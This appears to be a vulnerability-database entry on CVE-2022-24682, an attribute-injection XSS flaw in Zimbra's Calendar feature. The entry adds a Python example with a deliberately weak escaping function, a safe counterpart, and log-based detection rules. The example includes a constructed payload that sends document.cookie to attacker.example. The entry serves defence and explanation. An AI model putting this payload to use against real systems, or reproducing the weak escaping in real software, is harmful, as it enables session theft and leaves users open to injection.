CVE-2022-24682
published 2022-02-09


Priority: P1 (84)
CVSS 3.1 base score: 6.1 medium, vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Flags: KEV, ITW, EXPLOIT, Ransomware
CISA Known Exploited Vulnerability, due 2022-03-11
Exploited in the wild
EPSS: 31.06% (98.0th percentile)
An issue was discovered in the Calendar feature in Zimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 (update 1), as exploited in the wild starting in December 2021. An attacker could place HTML containing executable JavaScript inside element attributes. This markup becomes unescaped, causing arbitrary markup to be injected into the document.
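The description above is the attribute-context injection class: attacker text placed inside an element attribute reaches the document unescaped, so a quote in that text closes the attribute and whatever follows becomes new markup. The following is an added illustration, not Zimbra's code and not the CVE-2022-24682 payload (the vulnerable URI was withheld by Volexity): a renderer that escapes only the angle brackets and ampersand before putting untrusted text into an attribute, beside one that also encodes quotes, with a parser-based check for injected event-handler attributes. The render functions, the payload string and the attacker host are constructed for this example.

```python
import html
from html.parser import HTMLParser

# Constructed example: a calendar-entry title is interpolated into a title="" attribute.
# Not Zimbra's template code; the attribute and payload shape are assumptions.

def render_title_weak(title: str) -> str:
    # quote=False encodes < > & but leaves " and ' alone, so the value can
    # terminate the attribute and introduce attributes of its own.
    return '<div class="appt" title="%s"></div>' % html.escape(title, quote=False)

def render_title_safe(title: str) -> str:
    # quote=True also encodes " (as &quot;) and ' (as &#x27;), so the value
    # stays inside the attribute no matter what it contains.
    return '<div class="appt" title="%s"></div>' % html.escape(title, quote=True)

class AttrCollector(HTMLParser):
    """Collects every attribute name the parser sees on start tags."""
    def __init__(self) -> None:
        super().__init__()
        self.names: list[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        self.names.extend(name for name, _ in attrs)

def injected_handlers(markup: str) -> list[str]:
    """Event-handler (on*) attributes present after parsing the rendered markup.

    Parsing rather than regex-matching the raw string matters: the escaped
    output still contains the text 'onmouseover=' but it is attribute *content*,
    not an attribute, and only a parser can tell the difference.
    """
    p = AttrCollector()
    p.feed(markup)
    p.close()
    return [n for n in p.names if n.startswith("on")]

# Constructed attacker-controlled title: closes title="" and adds a handler.
PAYLOAD = '" onmouseover="fetch(\'https://attacker.example/x?c=\'+document.cookie)'

if __name__ == "__main__":
    for label, fn in (("weak", render_title_weak), ("safe", render_title_safe)):
        out = fn(PAYLOAD)
        print(f"{label}: {out}")
        print(f"  injected handlers: {injected_handlers(out)}")
```

The weak renderer yields a div carrying an `onmouseover` attribute the attacker chose; the safe one yields a div whose `title` merely contains the payload as text. The same check applied to a page's actual output is a quick way to confirm whether a sanitizer covers the attribute context and not just the text-node context.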

Affected (2 ranges)

Vendor | Product | Version range | Fixed in
synacor | zimbra_collaboration_suite | (no range given) | 
synacor | zimbra_collaboration_suite | >= 8.8.0 < 8.8.15 | 8.8.15

Note that the CPE range is coarser than the CVE description: the fix is in 8.8.15 patch 30 (update 1), so an 8.8.15 installation is only covered at that patch level or later, and the version string alone does not tell you whether it is patched.

Detection & IOCs (extracted from sources)

  • Monitor for outbound HTTP POST requests from Zimbra webmail sessions to external domains, which may indicate the JavaScript mail-theft payload exfiltrating email body and attachment data.
  • The attacker's JavaScript payload must first request a page containing a CSRF-Token before making subsequent mail-theft requests; monitor for anomalous CSRF-token fetches followed by bulk mail retrieval in Zimbra logs.
  • Reconnaissance phase used unique per-target image-beacon URLs (Freenom .ga domains on AS399269/BitLaunch) embedded in spear-phishing emails; monitor for outbound GET requests to .ga/.tk/.ml Freenom domains from mail clients.
  • All attacker-controlled servers were observed running Apache 2.4.6 on CentOS with PHP 5.4.16 with ZeroSSL certificates; this server fingerprint can be used to pivot on related infrastructure.
  • Attacker used 74 unique outlook.com sender addresses formatted as <name>_<name>@outlook.com or <name>.<name>@outlook.com with feminine first names; flag bulk outlook.com senders with this naming pattern targeting Zimbra users.
  • CVE-2022-24682 affects only Zimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 update 2; version 9.0.0 was tested and found likely unaffected.
  • The specific vulnerable URI pattern required for exploitation was intentionally withheld by Volexity at time of initial disclosure due to the absence of a patch.
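The detection items above (external POSTs from webmail sessions, a CSRF-token page fetch followed by bulk message retrieval, beacon requests to Freenom TLDs, and the outlook.com sender naming pattern) can each be turned into a rule over request and sender logs. The block below is an added example of that logic, not a Volexity or Zimbra artifact; the log layout ("timestamp sess=ID METHOD target"), the paths `/token-page` and `/msg?id=`, the hosts and the sender addresses are all constructed placeholders, since the real vulnerable URI was withheld and Zimbra's own log formats are not reproduced here.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log (not real Zimbra logs). Session A shows the mail-theft sequence:
# token-page fetch, a burst of message retrievals, then a POST off-host. Session B is benign.
HTTP_LOG = """\
2022-01-10T09:00:01 sess=A GET /token-page
2022-01-10T09:00:02 sess=A GET /msg?id=1001
2022-01-10T09:00:02 sess=A GET /msg?id=1002
2022-01-10T09:00:03 sess=A GET /msg?id=1003
2022-01-10T09:00:03 sess=A GET /msg?id=1004
2022-01-10T09:00:04 sess=A GET /msg?id=1005
2022-01-10T09:00:05 sess=A POST https://collector.example.ga/upload
2022-01-10T09:30:00 sess=B GET /token-page
2022-01-10T09:31:10 sess=B GET /msg?id=2001
2022-01-10T09:45:00 sess=B GET /img/logo.png
"""

LINE = re.compile(r"^(\S+) sess=(\S+) (GET|POST) (\S+)$")
TOKEN_PAGE = "/token-page"              # placeholder: a page that embeds the CSRF token
MSG_FETCH = re.compile(r"^/msg\?id=")   # placeholder: per-message retrieval URI
FREENOM_TLDS = (".ga", ".tk", ".ml")

def parse(log: str):
    """Yield (timestamp, session, method, target) for each well-formed line."""
    for raw in log.splitlines():
        m = LINE.match(raw.strip())
        if m:
            ts, sess, method, target = m.groups()
            yield datetime.fromisoformat(ts), sess, method, target

def bulk_fetch_after_token(log: str, min_fetches: int = 5, window_s: int = 30) -> list[str]:
    """Sessions that fetch the token page and then pull >= min_fetches messages within window_s."""
    token_seen: dict[str, datetime] = {}
    fetches: dict[str, int] = defaultdict(int)
    for ts, sess, method, target in parse(log):
        if method == "GET" and target == TOKEN_PAGE:
            token_seen[sess] = ts      # restart the window on every token fetch
            fetches[sess] = 0
        elif sess in token_seen and MSG_FETCH.match(target):
            if (ts - token_seen[sess]).total_seconds() <= window_s:
                fetches[sess] += 1
    return sorted(s for s, n in fetches.items() if n >= min_fetches)

def external_posts(log: str) -> list[str]:
    """Sessions that POST to an absolute, off-host URL: candidate exfiltration."""
    return sorted({s for _, s, m, t in parse(log) if m == "POST" and t.startswith("http")})

def freenom_targets(log: str) -> list[tuple[str, str]]:
    """(session, host) pairs for requests to Freenom free-TLD hosts (image-beacon infrastructure)."""
    hits = []
    for _, sess, _, target in parse(log):
        host = re.sub(r"^https?://", "", target).split("/")[0].lower()
        if host and host.endswith(FREENOM_TLDS):
            hits.append((sess, host))
    return hits

# <name>_<name>@outlook.com or <name>.<name>@outlook.com
SENDER = re.compile(r"^[a-z]+[._][a-z]+@outlook\.com$")

def suspicious_outlook_senders(addresses, min_distinct: int = 3) -> list[str]:
    """Distinct senders matching the naming pattern, reported only once there are enough
    of them to look like a campaign rather than a single ordinary outlook.com user."""
    matches = sorted({a.lower() for a in addresses if SENDER.match(a.lower())})
    return matches if len(matches) >= min_distinct else []

# Constructed sender list for the example.
SENDERS = ["anna_smith@outlook.com", "emma.jones@outlook.com",
           "olivia_brown@outlook.com", "it-support@corp.example",
           "anna_smith@outlook.com"]

if __name__ == "__main__":
    print("token fetch then bulk retrieval:", bulk_fetch_after_token(HTTP_LOG))
    print("external POSTs:", external_posts(HTTP_LOG))
    print("freenom targets:", freenom_targets(HTTP_LOG))
    print("suspicious senders:", suspicious_outlook_senders(SENDERS))
```

The burst rule keys on the ordering the payload needs (token first, then retrieval) rather than on volume alone, which keeps a user paging through a large mailbox from tripping it; the sender rule deliberately needs several distinct matching addresses, because one `first.last@outlook.com` sender is unremarkable. Thresholds and window are assumptions to tune against local baselines.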

CVSS provenance

Source | Version | Score | Severity | Vector
nvd | v3.1 | 6.1 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvd | v2.0 | 4.3 | MEDIUM | AV:N/AC:M/Au:N/C:N/I:P/A:N
vulncheck | | 6.1 | MEDIUM |
cisa | | 6.1 | MEDIUM |